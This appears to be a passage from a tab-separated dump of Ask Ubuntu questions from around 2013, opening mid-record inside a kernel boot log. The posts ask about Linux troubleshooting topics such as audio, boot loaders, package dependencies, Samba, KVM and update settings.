ata1.01 : atapi : hl-dt-st gce-8527b , 1.02 , max udma/33 [ 11.000261 ] ata1.00 : configured for udma/66 [ 11.048217 ] ata1.01 : configured for udma/33 [ 11.101005 ] isapnp : no plug & play device found [ 11.102214 ] scsi 0:0:0:0 : cd-rom hl-dt-st dvd-ram gh22np20 1.03 pq : 0 ansi : 5 [ 11.103973 ] sr0 : scsi3-mmc drive : 125x/48x writer dvd-ram cd/rw xa/form2 cdda tray [ 11.103978 ] cdrom : uniform cd-rom driver revision : 3.20 [ 11.104167 ] sr 0:0:0:0 : attached scsi cd-rom sr0 [ 11.104310 ] sr 0:0:0:0 : attached scsi generic sg0 type 5 [ 11.106319 ] scsi 0:0:1:0 : cd-rom hl-dt-st cd-rw gce-8527b 1.02 pq : 0 ansi : 5 [ 11.108913 ] sr1 : scsi3-mmc drive : 52x/52x writer cd/rw xa/form2 cdda tray [ 11.109078 ] sr 0:0:1:0 : attached scsi cd-rom sr1 [ 11.109205 ] sr 0:0:1:0 : attached scsi generic sg1 type 5 [ 11.128043 ] usb 1-4 : new high-speed usb device number 2 using ehci-pci [ 11.279021 ] usb 1-4 : new usb device found , idvendor=0ac8 , idproduct=3450 [ 11.279027 ] usb 1-4 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 11.279032 ] usb 1-4 : product : see me here [ 11.279037 ] usb 1-4 : manufacturer : see me here [ 11.704025 ] tsc : refined tsc clocksource calibration : 1591.107 mhz [ 11.704033 ] switching to clocksource tsc [ 16.000018 ] ata3 : link is slow to respond , please be patient ( ready=0 ) [ 20.816019 ] ata3 : srst failed ( errno=-16 ) [ 26.012017 ] ata3 : link is slow to respond , please be patient ( ready=0 ) [ 30.828019 ] ata3 : srst failed ( errno=-16 ) [ 36.024016 ] ata3 : link is slow to respond , please be patient ( ready=0 ) [ 65.872022 ] ata3 : srst failed ( errno=-16 ) [ 70.900022 ] ata3 : srst failed ( errno=-16 ) [ 70.910713 ] ata3 : reset failed , giving up [ 70.910807 ] freeing unused kernel memory : 784k freed [ 70.911109 ] write protecting the kernel text : 6252k [ 70.911214 ] write protecting the kernel read-only data : 2432k [ 70.911216 ] nx-protecting the kernel data : 3988k [ 70.933314 ] udevd [ 108 ] : starting version 175 [ 71.031144 ] [ drm ] initialized drm 1.1.0 20060810 [ 71.060859 ] disabling lock debugging due to kernel taint [ 71.081024 ] r8169 gigabit ethernet driver 2.3lk-napi loaded [ 71.081243 ] r8169 0000:02:00.0 : irq 44 for msi/msi-x [ 71.081487 ] r8169 0000:02:00.0 eth0 : rtl8102e at 0xf840c000 , 00 : e0:4c:1e:9d:9e , xid 04c00000 irq 44 [ 71.137892 ] i915 0000:00:02.0 : setting latency timer to 64 [ 71.138238 ] i915 0000:00:02.0 : irq 45 for msi/msi-x [ 71.138254 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 71.138257 ] [ drm ] driver supports precise vblank timestamp query . [ 71.138299 ] vgaarb : device changed decodes : pci:0000:00:02.0 , olddecodes=io+mem , decodes=io+mem : owns=io+mem [ 71.143241 ] [ drm ] initialized overlay support [ 71.314278 ] fbcon : inteldrmfb ( fb0 ) is primary device [ 71.370428 ] console : switching to colour frame buffer device 170x48 [ 71.376602 ] i915 0000:00:02.0 : fb0 : inteldrmfb frame buffer device [ 71.376606 ] i915 0000:00:02.0 : registered panic notifier [ 71.376657 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 81.414780 ] xor : automatically using best checksumming function : [ 81.452006 ] piii_sse : 5780.000 mb/sec [ 81.462230 ] device-mapper : dm-raid45 : initialized v0.2594b [ 82.203377 ] iso 9660 extensions : microsoft joliet level 3 [ 82.217983 ] iso 9660 extensions : rrip_1991a [ 82.655982 ] squashfs : version 4.0 ( 2009/01/31 ) phillip lougher [ 131.040182 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 131.761365 ] udevd [ 1111 ] : starting version 175 [ 134.704042 ] init : avahi-cups-reload main process ( 1150 ) terminated with status 1 [ 135.121892 ] microcode : cpu0 sig=0x6fd , pf=0x1 , revision=0xa3 [ 135.162470 ] lp : driver loaded but no devices found [ 135.167111 ] bluetooth : core ver 2.16 [ 135.167174 ] net : registered protocol family 31 [ 135.167177 ] bluetooth : hci device and connection manager initialized [ 135.167187 ] bluetooth : hci socket layer initialized [ 135.167192 ] bluetooth : l2cap socket layer initialized [ 135.167202 ] bluetooth : sco socket layer initialized [ 136.038669 ] bluetooth : rfcomm tty layer initialized [ 136.038692 ] bluetooth : rfcomm socket layer initialized [ 136.038695 ] bluetooth : rfcomm ver 1.11 [ 136.059898 ] intel_rng : fwh not detected [ 137.710747 ] ppdev : user-space parallel port driver [ 137.740072 ] microcode : cpu1 sig=0x6fd , pf=0x1 , revision=0xa3 [ 137.753131 ] microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba [ 138.139774 ] psmouse serio1 : alps : unknown alps touchpad : e7=10 00 64 , ec=10 00 64 [ 138.385134 ] parport_pc 00:08 : reported by plug and play acpi [ 138.385192 ] parport0 : pc-style at 0x378 , irq 7 [ pcspp , tristate ] [ 138.480199 ] lp0 : using parport0 ( interrupt-driven ) . [ 138.840033 ] psmouse serio1 : failed to enable mouse on isa0060/serio1 [ 139.022137 ] acpi warning : 0x00000428-0x0000042f systemio conflicts with region \pm2s 1 ( 20121018/utaddress-251 ) [ 139.022149 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 139.022155 ] acpi warning : 0x000004b0-0x000004bf systemio conflicts with region \gpo2 1 ( 20121018/utaddress-251 ) [ 139.022161 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 139.022164 ] acpi warning : 0x00000480-0x000004af systemio conflicts with region \gpo_ 1 ( 20121018/utaddress-251 ) [ 139.022170 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 139.022173 ] lpc_ich : resource conflict ( s ) found affecting gpio_ich [ 139.480556 ] coretemp coretemp.0 : using relative temperature scale ! [ 139.480584 ] coretemp coretemp.0 : using relative temperature scale ! [ 139.615313 ] input : imps/2 generic wheel mouse as /devices/platform/i8042/serio1/input/input3 sudo fdisk -l lists nothing
315880	pulseaudio equaizer not working	pulseaudio equizer gui wont start , it gives this error when typed in terminal : manevskifi4o @ m-ubuntu-13 : ~ $ pulseaudio-equalizer-gtk getting settings ... /usr/bin/pulseaudio-equalizer : line 221 : /home/manevskifi4o/.pulse/equalizerrc : no such file or directory mkdir : can not create directory ‘/home/manevskifi4o/.pulse/presets’ : no such file or directory /usr/bin/pulseaudio-equalizer : line 229 : /home/manevskifi4o/.pulse/equalizerrc.availablepresets.unsorted : no such file or directory sed : could n't flush stdout : broken pipe /usr/bin/pulseaudio-equalizer : line 232 : /home/manevskifi4o/.pulse/equalizerrc.availablepresets.unsorted : no such file or directory ls : can not access /home/manevskifi4o/.pulse/presets/*.preset : no such file or directory /usr/bin/pulseaudio-equalizer : line 235 : /home/manevskifi4o/.pulse/equalizerrc.availablepresets : no such file or directory rm : can not remove ‘/home/manevskifi4o/.pulse/equalizerrc.availablepresets.unsorted’ : no such file or directory traceback ( most recent call last ) : file `` /usr/share/pulseaudio-equalizer/pulseaudio-equalizer.py '' , line 535 , in < module > equalizer ( ) file `` /usr/share/pulseaudio-equalizer/pulseaudio-equalizer.py '' , line 357 , in __init__ getsettings ( ) file `` /usr/share/pulseaudio-equalizer/pulseaudio-equalizer.py '' , line 46 , in getsettings f = open ( eqconfig , `` r '' ) ioerror : [ errno 2 ] no such file or directory : '/home/manevskifi4o/.pulse/equalizerrc'
315886	why syntax error near unexpected token `fi ' is coming	this is my simple script but it is saying that syntax error near unexpected token `fi ' mysql -- user=root -- password= erpint -b -e `` select * from user_info ; '' | sed `` s/'/\'/ ; s/\t/\ '' , \ '' /g ; s/^/\ '' / ; s/ $ /\ '' / ; s/\n//g '' > /home/mayuri/detail.csv if [ $ ? -eq 0 ] ; then mutt -s `` mutt attach '' srini @ erpint.com -a /home/mayuri/detail.csv < /home/mayuri/trials.txt fi
315887	update manager showing for available updates , but not letting me to update	i have a problem here with update manager . everytime i start my pc , it pops up , saying that there are available updates . i 'll share the screenshot . as i click the `` install updates '' button , it asks for the authentication as expected . and when i enter the password and hit enter , i get the following window , saying some packages come from untrusted source : now the problem is , i do n't see any button to ignore those packages , and proceed . the only button i have is to close the window . and then the updates does not proceed . i also tried to update all the packages except the qtcreator packages . but it went in vain . is there any workaround ? do i also need to unselect any dependent packages ? if yes how to find them ?
315901	how to convert markdown to rich text ( rtf ) in ubuntu 13.04 ?	i want to convert text written in markdown to rich text on ubuntu 13.04 . i could not find any solution on the web , except for one mac os x script . how can i do that on ubuntu 13.04 ? preferably in the browser . p.s . i do n't need it the other way , the text gets always written in markdown and needs to get transformed to rich text .
315902	new ubuntu/linux user have some questions	i 'm a new linux/ubuntu user came from windows environment trying to figure my way into linux and planning to make a full transition when i feel ready , and have some basic questions to make things clear to me . 1- im using ubuntu 13.04 with kernel 3.8 pre-installed , what changes would happen if i installed newer kernel ? will i lose my installed apps ? drivers ? theme ? configurations ? anything i should be aware of in this matter ? 2- i install most of my apps directly from repositories/ppa 's , if i installed apps downloaded from sites - .deb files - will i be able to get lastest updates to these apps ? or would i update them manually ? 3- is there any idm like or any download manager that is integrated with browsers , to click and download with some nice features - multithreading , schedule , resume ? as i mentioned above i just came from windows , any tips to make things easier and clear would be appreciated . thank you : )
315904	dual boot macbook with ubuntu 13.04 , 32-bit	please how can i dual boot ubuntu 13.04 on my macbook running mac os x 10.5.8 with the following specs : model name : macbook model identifier : macbook5,2 processor name : intel core 2 duo processor speed : 2.13 ghz number of processors : 1 total number of cores : 2 l2 cache : 3mb memory : 2gb bus speed : 1.07 ghz boot rom version : mb52.0088.b05 smc version ( system ) : 1.38f5 serial number ( system ) : w89214se9gu hardware uuid : d0110864-a751-56af-8bb3-bba03a9e93fa sudden motion sensor : state : enabled i enjoyed using ubuntu on my dell notebook , but i do n't have it anymore plus i am new to mac and would love to have ubuntu running side by side with my macbook . i would appreciate it greatly if anyone could assist me to achieve this .
315905	optical character recognition for libreoffice	i have a paper document . there are more pages containing a table with 3 columns ( current number , name and a grade ) . i scanned it and got 16 jpeg documents . each jpeg is a scanned page . now , i need an ocr to convert each jpeg into text , in order to insert this table in an excel document . i use libreoffice and ubuntu 12.04 .
315907	libc.so.6 : version `glibc_2.16 ' not found	when importing a library ( cdms2 ) in python , i get the following error message : importerror : /lib/x86_64-linux-gnu/libc.so.6 : version `glibc_2.16 ' not found ( required by /usr/local/uvcdat/1.3.1/externals/lib/libcurl.so.4 ) my version of libc6 is currently 2.15 ( ubuntu 12.04 ) . my understanding is that the newest version is not in a stable repository : how can i force apt to update to version 2.16 ?
315909	firmware bug , try to use apic500	whenever i wake my computer out of suspension , i get the following error code . [ firmware bug ] : cpu 1 , try to use apic500 ( lut offset 0 ) for vector 0x400 , but the register is already in use for vector 0xf9 on another cpu before the part that says [ firmware bug ] is a list of numbers . they always change , but i 'll put in an example . [ 32176.997553 ] my cpu is an amd athlon ii x3 , if that helps . any ideas ?
315912	after installing/removing xen , ca n't use kvm	i 'm evaluating different virtualization solutions . i decided to go with kvm over xen . unfortunately , now i ca n't create any kvm virtual machines via libvirt . jonathanfisher @ blockparty /usr/share/qemu $ sudo virt-install -- name=pfsense -- arch=x86_64 -- vcpus=3 -- ram=1024 -- os-type=unix -- connect qemu : ///system -- virt-type kvm -- hvm -- accelerate -- vnc -- noautoconsole -- keymap=us -- os-type=unix -- disk path=/var/lib/libvirt/images/pfsense-disk1.qcow2 -w bridge : wan0 -w bridge : lan0 -v -- os-variant=freebsd7 -- boot hd starting install ... error internal error process exited while reading console log output : char device redirected to /dev/pts/11 could not open option rom 'pxe-ne2k_pci.rom ' : no such file or directory could not read keymap file : 'en-us' domain installation does not appear to have been successful . if it was , you can restart your domain by running : virsh -- connect qemu : ///system start pfsense otherwise , please restart your installation . what 's funny is the files are present : jonathanfisher @ blockparty /usr/share/qemu $ ls bios.bin linuxboot.bin pxe-e1000.rom pxe-pcnet32.rom pxe-virtio.rom vapic.bin vgabios-cirrus.bin vgabios-stdvga.bin keymaps multiboot.bin pxe-ne2k_isa.rom pxe-rtl8139.rom qemu-linaro vgabios.bin vgabios-qxl.bin vgabios-vmware.bin i 'm probably just missing a symlink somewhere ... this ca n't be that hard to fix . any ideas ? just need to be pointed in the right direction . thank you !
315914	step by step guide to partition an external hdd in two file formats	i just purchased an external hdd ( 1tb ) which i want to partition with two different file formats - ntfs and fat32 ( this partition is for my ps3 backups ) . at the moment it 's a giant 943mb ntfs partition and at the end of the operation i want it to be like : 643 mb ntfs partition ( as my main partition ) 300 mb fat32 partition ( to house my ps3 backups ) please can someone help me out ? thanks in advance .
315915	subwoofer and surrounds do n't work with a via2020 sound chipset	i 'm new to linux , and ubuntu 13.04 is the first linux i try ... this os is awsome , i love it , but for some reason i have a problem with my sound card . i am using asrock 's extreme3 x58 chipset with via2020 audio codec on it . the sounds work right out of installing , also had ubuntu update all that it needs . problem is , that only the front left , rear left , and front center speakes work . the subwoofer does n't and neither the right channels for both front or rear . if i switch to digital output ( instead of analog 5.1 or even stereo ) i can hear in the both front channel . the speakers are fine , and the connections are too . switched form windows 8 and it worked perfect there , so no reason why it should n't on ubuntu . tried alsamixer and turned all volumes up to the sky , but no good . please , let me know how can i fix this , id'e hate going back to windows .
315917	i am not able to access root 's home folder in ubuntu	i 'm using ubuntu 12.0.4 lts , and i want to access root 's home folder .
315921	comreset failed and slow boot times	i 've been having slow boot up times with a fresh install of 12.04.2 lts . i see this in my syslog : jul 2 13:42:56 victor-lenovo-u310 kernel : [ 20058.135895 ] ata1 : link is slow to respond , please be patient ( ready=0 ) jul 2 13:43:25 victor-lenovo-u310 kernel : [ 20087.780435 ] ata1 : comreset failed ( errno=-16 ) jul 2 13:43:30 victor-lenovo-u310 kernel : [ 20092.806429 ] ata1 : comreset failed ( errno=-16 ) jul 2 13:43:30 victor-lenovo-u310 kernel : [ 20092.806436 ] ata1 : reset failed , giving up i tried the the following kernel parameters with no success : libata.force=nohrst libata.force=nosrst libata.force=norst libata.force=noncq i have tried re-installing 12.04.2 lts and have also installed 13.03 and still nothing has worked . also set the ata controller to compatible ( ide ) , ahci , and raid , and none of those fixed the problem . reset my bios to factory settings , also nothing . my specs : model : lenovo ideapad u310 processor : 1.7 ghz ( 2.6 ghz max turbo ) intel core i5 3317u ram : 4gb ( ddr3 ) graphics : intel hd graphics 4000 storage : 500gb ( 5,400 rpm ) hdd + 24 gb ssd ( ca n't use it for some reason )
315923	new install ubuntu 13.04 renders laptop slow and weak help me with my hardware	ubuntu is awesome ! it works great on my other laptops . does any one know how i can get my desktop environment to accelerate ? i feel like my hardware is not being utilized , here are the specs : -gateway ne71b series -4gb ddr3 memory -500gb hdd amd radeon hd 7310 . when i installed i opened firefox to view youtube . worked fine . opened full view and video slowed and lagged . closed full view and returned to normal . internet connection works on other laptops . also the system crashes under software load , ie a few windows opened , like vlc , software centre , home folder . is this the amd chipsets like the dual core e1-1200 ? i am in need of a pro here ... . i just need to enjoy the ubuntu on my new laptop . mouse is slow as well . new install so no virus yet . thanks in advance to anyone how can help .
315925	ubuntu file system for backup server	i 'm setting up an ubuntu 12.04.2 lts server as an online backup server . i have 3rd party software which i will be installing on the server which will take care of the backups . my question is , i will have around 15tb of space where the data will be stored , and am unsure of which file system would be best suited , ext4 / jfs etc ... ? any recommendations would be appreciated . greg
315933	getting kernel panic wth the message `` not syncing fatal exception in interrupt ''	i just installed 13.04 . sometimes it suddenly goes to a black screen showing kernel panic not syncing fatal exception in interrupt i have to do a hard shut-down to reboot the system . please tell me what 's wrong in my system .
315934	udev alternates between correct and incorrect network configuration on subsequent reboots	i 'm currently experiencing a problem that seemingly lies with udev in ubuntu 12.04 . i have numerous machines in the lab i am managing , all of which have been cloned from a single original master install , on 11 of the 12 machines networking works properly . these machines with the exception of their hostname and ip should be identical as all user data is stored on a network share . however on a single machine udev appears to incorrectly configure the network hardware on subsequent reboots . if i delete /etc/udev/rules.d/70-persistent-net.rules then reboot the machine my ethernet interface is correctly configured with my ethernet adapter ( intel 82579lm ) showing up as eth0 . however the next time the machine is rebooted the network connection is incorrectly configured once again showing only the local loopback ( lo ) . i 'm tempted to re-clone the machine but would like to figure this problem out in case it crops up again ( and to satisfy my own curiosity ) . has anyone else here experienced this or a similar issue ? if my description of the problem is in anyway deficient please let me know .
315935	php-fpm dynamic vs ondemand speed	in terms of speed , which is better ? dynamic or ondemand ? i just switch from apache to nginx so i need to know which of the two is better .
315937	creating multiple password protected shares in samba	so i 've recently installed ubuntu 13.04 onto a small home server build , and now i 'm in a situation i ca n't quite figure out . i have 2x2tb hard drives ( not in raid ) that i 'm using for backups . basically what i 'm trying to do is have four folders in one of the drives and share each folder . also , i 'd like to share them with a password so that when they map the folder as a network drive in windows , only they can access it . however , my user account in ubuntu will only allow me to use my account for one password protected share in samba . does anyone know how i can use samba or something similar so that i can use one ubuntu/samba user but on multiple shares ? i 'm not very familiar with linux systems in general , but i have at least a grasp on some of the basic concepts , so the simpler the explanation the better . thanks ahead . : )
315938	ubuntu 12.10 : overheating problem	i 'm currently using a samsung notebook with the following specs stated below : os : windows 7 64 - bit processor : intel ( r ) core ( tm ) i5-3210m cpu @ 2.50ghz , 2501 mhz , 2 core ( s ) , 4 logical processor ( s ) ram : 4.00 gb hdd : 500 gb graphics card : radeon hd 7xxxm series recently , i 've dual-booted my notebook with ubuntu 12.10 , everything was working fine until i happened to notice the sudden heating of my notebook . at first , i did n't mind it because i thought it was normal , but it was n't , it heated up faster than i expected . i tried googling for any solution but i ended up with nothing . are there any viable solutions i could apply immediately so i can continue the project i 'm currently working on ? ps i 'm new to ubuntu so please bear with me . thanks so much .
315939	how can i set up gestures in kubuntu ?	i would like to do the following thing : scroll down with three fingers = > windows presentation from all desktops ( equivalent to ctrl+f10 ) . the question is `` how can i do it ? '' : ) i have ( quite ) understood how to link the mouse gestures with programs ( quite , because i could not even get kate start ) . although i totally did not understand how to link the fact that i want it with three fingers ( 3 fingers tapping is actually associated to the middle mouse button ) and i did not understand how to pass the command of windows presentation . thanks in advance for any help !
315941	usb mic not detected in sound settings [ ubuntu 13.04 ]	i recently purchased an atr 2500 for home recordings . it is n't detected by ubuntu 13.04 ( had similar problems in zorin ) the volume controls on the mic work , and the blue light is on so it 's not the mic 's problem . however , when i enter the sound settings , it 's not even listed . i updated pulseaudio , but to no avail . it is shown under alsamixer as drive 3 , nothing is muted , everything turned on .
315946	persistent `` held broken packages '' error	sudo apt-get update & & sudo apt-get install netflix-desktop gives the error the following packages have unmet dependencies : netflix-desktop : depends : wine-browser-installer but it is not going to be installed e : unable to correct problems , you have held broken packages . but dpkg -- get-selections | grep hold shows nothing . i 'm running 12.04 64-bit . i 've followed the directions in how do i resolve unmet dependencies ? : confirmed that main , universe , restricted and multiverse software sources are enabled sudo apt-get clean sudo apt-get -f install ( returning '0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . ' ) sudo dpkg -- configure -a sudo apt-get -f install ( again '0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . ) sudo apt-get -u dist-upgrade ( 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . ) used y ppa manager to check for duplicate ppas ( none found ) [ edit ] i have had the same error with other packages . here 's the output requested by alaa : sudo apt-get install wine-browser-installer reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine-browser-installer : depends : wine-compholio ( > = 1.5.19~precise1 ) e : unable to correct problems , you have held broken packages . [ edit 2 ] doing sudo apt-get install wine-compholio gave a list of further dependencies . i installed each one , and now i have done sudo apt-get install netflix-desktop without error
315950	drivers for wireless card asus pce-ac66 ?	where can i get an ubuntu driver for this card ? is there any ? otherwise can i install a generic wireless driver even if it works sub-optimally but at least will work . update : as per the comments and running : $ lspci -nn -d 14e4 : 82:00.0 network controller [ 0280 ] : broadcom corporation device [ 14e4:43a0 ] ( rev 02 ) but note that my board z9pe-d8 ws board comes with an integrated network card ( actually two i believe ) but i need the wireless .
315953	ca n't uninstall manually installed python 2.7.5	i manually installed python 2.7.5 using checkinstall . i downloaded and extracted the source tarball from python.org in /usr/local/src , then ran these commands ./configure sudo make sudo checkinstall i wanted to upgrade from 2.7.4 to 2.7.5 , i probably could have used apt-get to just install the next version , but now i want to uninstall it , i went to the ubuntu software center and tried to remove it , but it tells me that i need to remove all these other programs that depend on python even though i already have the python version that came with my installation . i 'm not really sure how to uninstall it . apt-cache policy python python2.7 outputs : python : installed : 2.7.5-1 candidate : 2.7.5-1 version table : *** 2.7.5-1 0 100 /var/lib/dpkg/status 2.7.4-0ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ raring/main amd64 packages python2.7 : installed : 2.7.4-2ubuntu3 candidate : 2.7.4-2ubuntu3 version table : *** 2.7.4-2ubuntu3 0 500 http : //us.archive.ubuntu.com/ubuntu/ raring/main amd64 packages 100 /var/lib/dpkg/status in /usr/local/src/python2.7.5 , there is a deb package called python_2.7.5-1_amd64.deb .
315954	i am not able to view mp3 files on my sansa clip player that were previously loaded using windows	i have added the file .is_audio_player and still no luck . any suggestions ? in ubuntu 12.04 , when i connect mp3 player , the home folder opens and i can see files that i have added to the player since i started using ubuntu , however any music/podcasts/audiobooks that i put on the player when i was using windows do not show at all . they do not show in rhythmbox either . ubuntu will recognize the mp3 player in msc but not in mtp .
315955	why i ca n't access google products like google.com and youtube.com ?	first youtube started not loading videos , then almost all google products had problem . i had 12.04 and 12.10 on asus n56vm . there was that problem . now i have 13.04 on same machine . it still is . i have chrome , chromium and firefox . there is no difference . internet is generally fine . the problem is only on google products . edit : changing dns not worked . i tried lots of dns servers . i tried with 3 different isps . it is not a flash player issue i think , because the problem is on all of google services ( gmail , calendar , maps ) , not only youtube . tried disabling hardware acceleration option on flash player . the problem is temporary . some times google.com , gmail or youtube work , some times not . thus so difficult to track the problem . these are some links related to my question . it is the same problem and no answer . bug google locking on ubuntu strange networking problem . google does not work ubuntu 12.04 google connection problem edit 2 : question marked as duplicate . okay , question is same ( i noticed that when it marked , sorry ) . but the answer to that question is `` change dns '' and i said it does not work for me . edit 3 : i noticed that if i sing out from google account youtube works well on all of my browsers ( chrome , chromium , firefox ) . i tried with different google accounts of mine on different browsers . result is same . finally i catch something to track this problem . if i 'm signed in to google there is problem with google products .
315956	defunct dbus-daemon zombie freezes ssh login for 30 seconds	i 'm running ubuntu 12.04.2 lts ( precise pangolin ) and noticed a 30 second delay whenever i log into my server via ssh or perform any kind of login via sudo on that machine . i can provoke immediate execution by killing the defunct dbus-daemon showing up during the delay : output of ps fax |grep dbus 19222 ? ss 0:00 dbus-daemon -- system -- fork -- activation=upstart 19752 ? z 0:00 \_ [ dbus-daemon ] < defunct > taping into the dbus using dbus-monitor -- system i 'm getting : signal sender=org.freedesktop.dbus - > dest= ( null destination ) serial=7 path=/org/freedesktop/dbus ; interface=org.freedesktop.dbus ; member=nameownerchanged string `` :1.4 '' string `` '' string `` :1.4 '' each login . stopping the dbus service eliminates this problem but probably causes many other ... i 'm not running xorg on the machine but the packages are present for x11 forwarding capabilities . i 've ruled out the common motd script delay and ssh `` usedns no '' fixes one finds when looking up login delay issues . many thanks in advance for any help with this , it 's been driving me crazy ; - )
315967	install ubuntu packages to other machine ?	i have installed ubuntu 12.04 on my laptop with all the packages . i am finished with it , everything is up and running . now i want to install ubuntu on my desktop but do n't want to download all the stuff again and install it one by one . is there any way to clone my ubuntu from laptop to desktop .
315969	how can i change the size and position that an application appears when first launched ?	when ever i launch chrome it manifests at a specific size at the top left corner of my screen . everytime i have to manually resize it and position it in the center of the screen . how can i change the window size and position on the screen upon launch ?
315971	snapchat on ubuntu touch ?	is it imposible to downloade snapchat on ubuntu touch ? i 'm wondering if i should download ubuntu touch on my nexus 4 but if is not possible to download the snapchat from the softwear center , i think i will not .
315977	grub2 bootloader not loading	i previously had ubuntu 12.04 . then i installed windows on another partition . since then , the bootloader did not start showing up when booting , and windows started up asking me to log in . then i made a bootable usb with ubuntu 13.04 but when i booted from the pendrive , just a blank screen came with a message secureboot not enabled which disappeared as soon as it came . i searched ubuntu forums and found a similar question . the answer was to edit some lines of boot/grub/grub.cfg . here is the link - http : //ubuntuforums.org/showthread.php ? t=2081912 . after doing the edits suggested in the above link , the ubuntu installation screen came . i chose to upgrade my 12.04 to 13.04 . after the 13.04 was successfully installed i restarted but the grub2 bootloader did not show up and booted into windows directly . since then always this has happened . i also verified that 13.04 has been installed by selecting try ubuntu and checking the partition on which i installed 13.04 . all the folders such as bin , boot , ... . etc were present . can anyone please inform how can i bring back the grub2 bootloader with booting options into windows 7 and ubuntu 13.04 and i possible , set ubuntu as the default os to boot after the time-out period ? my hardware specifications -- lenevo ideapad z570 with intel i5 ( 64 bit )
315983	windows accidently deleted , ubuntu installation help	i accidently deleted windows from another laptop and only have ubuntu to use on it now , during installation at the partitioning menu , when i click install now it says `` no root file system is defined , please correct this from the partitioning menu '' i have tried installing this several times and keep facing new problems each time . in the menu i have /dev/sda , /dev/sda1 ext4 118432 mb 2367mb used and /dev/sda5 swap 1599mb ) mb used , how do i resolve this from here ? i know nothing about ubuntu at all so an easy step by step would be appreciated sudo fdisk -l disk /dev/sda : 120.0gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0003eeed device boot start end blocks id system /dev/sda1 * 2048 231315455 115656704 83 linux /dev/sda2 231317502 234440703 1561601 5 extended /dev/sda5 231317504 234440703 1561600 82 linux swap / solaris
315984	mysql-client 5.6 ubuntu 12.04	how long does ubuntu us usually take to release official packages for newly release software ? such as mysql-client 5.6
315985	multi monitor fullscreen video problem	so i have a question , i am somewhat new to ubuntu and my current system has a three monitor setup on it . it 's all hooked up and works great , but i wanted to install the disc that came with the monitors , thinking that would give me more functionality controls and help me understand the system . ultraviewsetup1.00.exe and it will try and open it via archive manager then will display this error archive : /media/ultraview desktop suite/ultraview desktop suite/ultraviewsetup1.00.exe [ /media/ultraview desktop suite/ultraview desktop suite/ultraviewsetup1.00.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /media/ultraview desktop suite/ultraview desktop suite/ultraviewsetup1.00.exe or /media/ultraview desktop suite/ultraview desktop suite/ultraviewsetup1.00.exe.zip , and can not find /media/ultraview desktop suite/ultraview desktop suite/ultraviewsetup1.00.exe.zip , period . my actual question is every time i full screen a video from another screen it will always go to the far left screen and i want to be able to choose witch screen is full screened if anyone can help me out on what i need to do that would be greatly appriciated ! ! ! !
315996	autopilot importerror : no module named input	i 'm on ubuntu 13.04 . i 'm following this tutorial to write autopilot tests . i get an error when i try to run or list the autopilot tests : $ autopilot list currencyconverter loading tests from : /home/merlijn/autopilottests/ubuntu-sdk-tutorials/getting- started/currencyconverter/tests/autopilot failed to import test module : currencyconverter.tests.test_currencyconverter traceback ( most recent call last ) : file `` /usr/lib/python2.7/unittest/loader.py '' , line 252 , in _find_tests module = self._get_module_from_name ( name ) file `` /usr/lib/python2.7/unittest/loader.py '' , line 230 , in _get_module_from_name__import__ ( name ) file `` /home/merlijn/autopilottests/ubuntu-sdk-tutorials/getting-started/currencyconverter/tests/autopilot/currencyconverter/tests/__init__.py '' , line 25 , in < module > from autopilot.input import mouse , touch , pointer importerror : no module named input unittest.loader.moduleimportfailure.currencyconverter.tests.test_currencyconverter if you need more information , feel free to ask .
316006	how to completely disable updates of all kinds , and not ever see prompts to update ?	i 'm shipping a ubuntu-based system which once shipped will never be connected to a network . i never , ever , ever want it to prompt the user to check for updates , and i never ever ever want it to try to check for updates . i definitely never want the red triangle with exclamation mark to appear in the gnome menu bar . i have already done this : $ cat /etc/apt/apt.conf.d/10periodic apt : :periodic : :update-package-lists `` 0 '' ; apt : :periodic : :download-upgradeable-packages `` 0 '' ; apt : :periodic : :autocleaninterval `` 0 '' ; and this : $ dconf write /apps/update-manager/remind-reload false $ gconftool -s -- type bool /apps/update-notifier/auto_launch false and this : $ cat /etc/update-manager/release-upgrades prompt=never but even with all that , it still periodically shows the red triangle with ! saying it failed to check for updates . what have i missed ?
316008	can you add extra animations for the compiz manager animations editor ?	i started playing around with the compiz manager animations bit , but they 're quite boring . i wondered if there are any i can download and if so where from ? i 'm using ubuntu 12.04 lts
316013	does ubuntu allow extended desktop	i currently have windows 7 starter which does not allow for extended desktop , meaning i can not run dual screens . does ubuntu support this ?
316014	how can i configure dansguardian to filter https traffic ?	i am having issues configuring dansguardian to filter https traffic . is there a way to force https traffic to go through a dansguardian filter ?
316015	skype ubuntu 13.04 64bit	when i try to install skype on ubuntu 13.04 i get the following error : error can not install 'libasound2 : i386 ' from ubuntu software center if i try through terminal i get : the following packages have unmet dependencies libasound2 : i386 : depends : libc6 : i386 ( > = 2.16 ) but it is not going to be installed . i 've tried in terminal sudo apt-get install libasound2-plugings : i386 it too has unmet dependencies
316017	unity is gone . all window buttons gone . how to fix it ?	today i logged in ubuntu and without me doing any changes to the system recently , unity is gone . i have no dash , i ca n't move around my windows . what i noticed is that e.g nautilus opens but there are no window frames/buttons . i found a relative question in the forums , tried the answer but nothing changed . can someone help me fix or re-install unity ? thanks in advance
